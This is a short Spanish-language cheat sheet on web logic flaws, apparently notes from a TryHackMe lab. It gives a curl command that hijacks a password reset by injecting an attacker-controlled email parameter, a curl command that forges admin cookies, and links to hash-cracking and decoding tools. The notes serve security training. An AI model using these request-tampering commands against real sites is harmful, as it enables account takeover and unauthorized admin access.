Logic Flaws

Password Reset
¿El email o método de contacto puede modificarse en la cabecera de la petición?
[email protected]:~$ curl 'http://10.10.164.235/customers/[email protected]' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'
Cookie Tampering
¿Está cifrada con un hash? => https://crackstation.net/​
¿Algún parámetro sospechoso? ex: Set-Cookie: admin=false; Max-Age=3600; Path=/
¿Está encodeada? => https://gchq.github.io/CyberChef/ ; Burpsuite
#Cambiando la cookie en el header
curl -H "Cookie: logged_in=true; admin=true" http://10.10.164.235/cookie-test

Última actualización 1yr ago